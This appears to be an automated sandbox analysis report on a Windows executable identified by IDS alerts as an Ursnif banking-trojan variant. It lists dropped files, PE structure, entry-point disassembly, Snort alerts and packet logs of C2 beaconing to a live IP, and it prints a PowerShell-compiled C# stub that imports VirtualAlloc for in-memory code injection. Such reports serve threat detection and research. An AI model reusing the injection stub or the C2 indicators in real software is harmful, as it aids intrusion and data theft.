                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols, created Thu Oct 13 16:31:12 2022, 1st section name ".debug$S"
                                      Category:dropped
                                      Size (bytes):1320
                                      Entropy (8bit):3.9582729102086303
                                      Encrypted:false
                                      SSDEEP:24:HynW9Bit0iuuH5hKdNII+ycuZhNiakSKPNnq9hgd:UsitwunKdu1ulia3mq9y
                                      MD5:8C3DC050387A0493058D36D4B6CF27B1
                                      SHA1:C88C189BBA9142F115A3A17D15A9B422B56D37D3
                                      SHA-256:CB62F45C1C604DFB9C20DF39F2071D92D6C48BF98D668D356D3E0CF764434AC8
                                      SHA-512:29DCB6B3FA9333F4DB07DF839AF10638859AD132690E9476B532DA7BF35FA51E5C723D05807073620B66F29AA42C33DD38498D89EA43E12FD24B68828E1BFEFC
                                      Malicious:false
                                      Preview:L...P=Hc.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........L....c:\Users\user\AppData\Local\Temp\CSC1B282484FFBD4A98A4CBD8847ACCD8A8.TMP...............w.gQk..O.A...............5.......C:\Users\user\AppData\Local\Temp\RESEB8E.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.2.s.g.i.a.o.a...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1sgyoy32.ak1.ps1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:very short file (no magic)
                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Preview:1

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ekbzmn3f.skw.psm1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:very short file (no magic)
                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Preview:1

                                      C:\Users\user\AppData\Local\Temp\n2sgiaoa.0.cs

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                      Category:dropped
                                      Size (bytes):400
                                      Entropy (8bit):4.978058994390849
                                      Encrypted:false
                                      SSDEEP:6:V/DsYLDS81zuYl8HPMRSRa+eNMjSSRru+LjGVZfmaSRNEolEimZlRBPFQy:V/DTLDfuJ9eg5ru+Ly8yWEPlRBiy
                                      MD5:F31A91CB873D422F30E84BFC6F0E4919
                                      SHA1:87946E5B050BC8C66C9F04EBB9F82E210522D8EE
                                      SHA-256:91AF8FC99B650C87F7C49FAA1E0499F673E034ED712EB62782CFACBDF8329F84
                                      SHA-512:242E12D8C01EF5BF6866FC09BD8A4AB9FB6C7EA1AC4BEAD56610DB30F15F0C7B38D7DA8706AB4BB8AD5647D5B2CCFB9717B85324CA0099C6DCDD7FDE13E5906B
                                      Malicious:false
                                      Preview:.using System;.using System.Runtime.InteropServices;..namespace gwrevlnvsd.{. public class qlmb. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint ymctti,uint jwdycptleij);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr kdqbriigsxr,uint hudaj,uint wtj,uint gyvhd);.. }..}.

                                      C:\Users\user\AppData\Local\Temp\n2sgiaoa.cmdline

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (350), with no line terminators
                                      Category:dropped
                                      Size (bytes):353
                                      Entropy (8bit):5.190119417850032
                                      Encrypted:false
                                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fGFzxs7+AEszI923fGA:p37Lvkmb6KzuWZE2j
                                      MD5:6F676A14F55792FCAF9AB8D3BC3930D3
                                      SHA1:C2FFBC5923D1AE477656A42CF3E983524AFD5687
                                      SHA-256:FBA75ABB7F20F45450B907669B0A0D01A02D060A647A1E14425338A3CB32A807
                                      SHA-512:D76EB02D9B0A4551FCC56485E85FA8992A8920D2361CBB4D9D721F2804BEF087B9BB603CA32EE8CB5EAE591F12C14D8D7578BB476C2D5FC385867D3D4148C60F
                                      Malicious:false
                                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\n2sgiaoa.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\n2sgiaoa.0.cs"

                                      C:\Users\user\AppData\Local\Temp\n2sgiaoa.dll

                                      Download File
                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):3584
                                      Entropy (8bit):2.604625908121872
                                      Encrypted:false
                                      SSDEEP:48:6CXQ3r5BAbBicLCL1Wh4JeL31ulia3mq:8b5BiLVuEK
                                      MD5:D6661E74516E95B8506921C266FCC378
                                      SHA1:D4A317550C91B8D1BAC27056A2D176D2A46195E7
                                      SHA-256:B86245487032D5B0AB8C861DC33CF96333D046394F3A4CB83E586B92504BF63C
                                      SHA-512:6BB01F1FCD2617BF8BFEB7757278ECD3A5F2A2FC46D72661E148E485BFB511B8E6C483794D444C98573BFB655FC12389331DDD89E268D64BBAF8361A3F957215
                                      Malicious:false
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P=Hc...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....*BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................7.0............... ...................................... >............ P............ X.....P ......e.........k.....r.....~.....................e. ...e...!.e.%...e.......*.....3.3.....>.......P.......X...........

                                      C:\Users\user\AppData\Local\Temp\n2sgiaoa.out

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (429), with CRLF, CR line terminators
                                      Category:modified
                                      Size (bytes):850
                                      Entropy (8bit):5.294801983238796
                                      Encrypted:false
                                      SSDEEP:12:xKIR37Lvkmb6KzuWZE2CKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KzvE2CKaM5DqBVKVrdFAMBJTH
                                      MD5:E21C14E505268332566B043E3A794256
                                      SHA1:F402FC38AAD9C5B16B90C809E71CE61FBD5B6E53
                                      SHA-256:568B3CC6ED8389B85718933FE231DB4152F86EC9865A81C6E2284D3DB23E1710
                                      SHA-512:D50F72A3E315A1C8FED7B20B35106AC4AB5FC012C3B0AB6F1B5A2EF30D08518DAA93D14559D39B2A785B9E9180F072A4072E69670DA49D4BCC6889BF245EB11F
                                      Malicious:false
                                      Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\n2sgiaoa.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\n2sgiaoa.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.519660398973527
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:bf.exe
                                      File size:37888
                                      MD5:b7ce4f9f6ecd85bb5edbb6964226fdb6
                                      SHA1:12b28a42e960dfc522348eba37b00ea74a0df527
                                      SHA256:bf5845a6b0df356338cc4ae53dd2cdefcb114bd95f351e55fd430cee5408ffeb
                                      SHA512:1f5588d5b0816bbfc51394f434a9a80a96c68b66ca86a6a3cd53d64bf6a63751902c5f782a15522749231022c2695c6df7fbc604ae1d242f21554269f6d31e86
                                      SSDEEP:768:7QLm41fM01vAoyRdq63goMWPXE2bE/JVMq2LATqeeAeOu2D2wqmLiuU:7L41fMSvVAdqlaPGhVMq2LpeReOb2Pmm
                                      TLSH:FD03D1A76BA004BAC9D383353A396685DF441332423958E0E7BB4A398BD6C4FD56F713
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y..+...x...x...x..lx...x...xQ..x...x...x..vx...x..kx...x..nx...xRich...x........PE..L.....%c............................/......

                                      File Icon

                                      Icon Hash:00828e8e8686b000

                                      Static PE Info

                                      General

                                      Entrypoint:0x40182f
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x632596C9 [Sat Sep 17 09:43:37 2022 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:0
                                      File Version Major:5
                                      File Version Minor:0
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:0
                                      Import Hash:1640d668d1471f340cbe565fe63522f6

                                      Entrypoint Preview

                                      Instruction
                                      push esi
                                      xor esi, esi
                                      push esi
                                      push 00400000h
                                      push esi
                                      call dword ptr [0040203Ch]
                                      mov dword ptr [00403160h], eax
                                      cmp eax, esi
                                      je 00007F3B38DDEC97h
                                      push esi
                                      call dword ptr [00402008h]
                                      mov dword ptr [00403170h], eax
                                      call dword ptr [00402044h]
                                      call 00007F3B38DDE8A9h
                                      push dword ptr [00403160h]
                                      mov esi, eax
                                      call dword ptr [00402040h]
                                      push esi
                                      call dword ptr [00402048h]
                                      pop esi
                                      push ebp
                                      mov ebp, esp
                                      sub esp, 0Ch
                                      push ebx
                                      push esi
                                      mov esi, eax
                                      mov eax, dword ptr [00403180h]
                                      mov ecx, dword ptr [esi+3Ch]
                                      mov ecx, dword ptr [ecx+esi+50h]
                                      lea edx, dword ptr [eax-69B24F45h]
                                      not edx
                                      lea ecx, dword ptr [ecx+eax-69B24F45h]
                                      push edi
                                      and ecx, edx
                                      lea edx, dword ptr [ebp-08h]
                                      push edx
                                      lea edx, dword ptr [ebp-04h]
                                      push edx
                                      add eax, 964DA0FCh
                                      push eax
                                      push ecx
                                      call 00007F3B38DDEEFDh
                                      test eax, eax
                                      jne 00007F3B38DDECCCh
                                      mov edi, dword ptr [ebp-04h]
                                      push esi
                                      push edi
                                      call 00007F3B38DDEFD3h
                                      mov ebx, eax
                                      test ebx, ebx
                                      jne 00007F3B38DDECA8h
                                      mov esi, dword ptr [edi+3Ch]
                                      add esi, edi
                                      push esi
                                      call 00007F3B38DDE6F4h
                                      mov ebx, eax
                                      test ebx, ebx
                                      jne 00007F3B38DDEC97h
                                      push edi
                                      mov eax, esi
                                      call 00007F3B38DDF1D4h
                                      mov ebx, eax
                                      test ebx, ebx
                                      jne 00007F3B38DDEC89h
                                      mov esi, dword ptr [esi+28h]
                                      push eax
                                      push 00000001h
                                      add esi, edi
                                      push edi
                                      call esi
                                      test eax, eax
                                      jne 00007F3B38DDEC7Ah
                                      call dword ptr [0000202Ch]

                                      Rich Headers

                                      Programming Language:
                                      • [IMP] VS2008 SP1 build 30729
                                      • [LNK] VS2008 SP1 build 30729

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x20e80x50.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x50000x10.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x60000xd8.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000xa8.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x10000x1000False0.718017578125data6.515539058364033IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0x20000x4c00x600False0.4635416666666667data4.488955985688776IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0x30000x1940x200False0.056640625data0.12227588125913882IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .bss0x40000x2dc0x400False0.7607421875data6.3016514258390215IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0x50000x100x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0x60000x80000x7200False0.9711143092105263data7.860073249744783IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                      Imports

                                      DLLImport
                                      ntdll.dll_snwprintf, memset, NtQuerySystemInformation, _aulldiv
                                      KERNEL32.dllGetModuleHandleA, GetLocaleInfoA, GetSystemDefaultUILanguage, HeapAlloc, HeapFree, WaitForSingleObject, Sleep, ExitThread, lstrlenW, GetLastError, VerLanguageNameA, GetExitCodeThread, CloseHandle, HeapCreate, HeapDestroy, GetCommandLineW, ExitProcess, SetLastError, TerminateThread, SleepEx, GetModuleFileNameW, CreateThread, OpenProcess, CreateEventA, GetLongPathNameW, GetVersion, GetCurrentProcessId, GetProcAddress, LoadLibraryA, VirtualProtect, MapViewOfFile, GetSystemTimeAsFileTime, CreateFileMappingW, QueueUserAPC
                                      ADVAPI32.dllConvertStringSecurityDescriptorToSecurityDescriptorA

                                      Network Behavior

                                      Snort IDS Alerts

                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                      192.168.2.545.8.158.10449696802033204 10/13/22-09:30:54.079674TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4969680192.168.2.545.8.158.104
                                      192.168.2.545.8.158.10449696802033203 10/13/22-09:30:55.414317TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4969680192.168.2.545.8.158.104

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 13, 2022 09:30:53.217489004 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.309739113 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.309973955 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.311197996 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.403239965 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.640887022 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.640933037 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.640959024 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.640983105 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.641011000 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.641037941 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.641058922 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.641083956 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.641103029 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.641108036 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.641143084 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.641199112 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.641237974 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.733346939 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.733412027 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.733474016 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.733517885 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.733557940 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.733597994 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.733604908 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.733638048 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.733648062 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.733660936 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.733684063 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.733716965 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.733726025 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.733745098 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.733767033 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.733792067 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.733808041 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.733825922 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.733850002 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.733871937 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.733890057 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.733901978 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.733932018 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.733948946 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.733972073 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.733993053 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.734010935 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.734038115 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.734050989 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.734066963 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.734091997 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.734112024 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.734133959 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.734150887 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.734174013 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.734196901 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.734230995 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.826613903 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.826695919 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.826759100 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.826819897 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.826843023 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.826884031 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.826906919 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.826917887 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.826977015 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.826984882 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.827044010 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.827049971 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.827110052 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.827112913 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.827158928 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.827163935 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.827200890 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.827204943 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.827243090 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.827248096 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.827289104 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.827634096 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.827759027 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.828269005 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.828363895 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.828507900 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.828577042 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.828592062 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.828644037 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.828665018 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.828713894 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.828728914 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.828779936 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.828787088 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.828846931 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.828850985 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.828917027 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.828922033 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.828983068 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.828991890 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.829051018 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.829070091 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.829138994 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.829149961 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.829205990 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.829210997 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.829273939 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.829274893 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.829341888 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.829343081 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.829407930 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.829416037 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.829474926 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.829477072 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.829541922 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.829543114 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.829608917 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.829611063 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.829677105 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.829679966 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.829745054 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.829746008 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.829813004 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.829813957 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.829879045 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.829884052 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.829950094 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.830312967 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.830398083 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.831373930 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.831486940 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.831617117 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.831660986 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.831691980 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.831728935 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.924022913 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.924089909 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.924150944 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.924190998 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.924222946 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.924231052 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.924268961 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.924268961 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.924273014 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.924312115 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.924319029 CEST804969645.8.158.104192.168.2.5
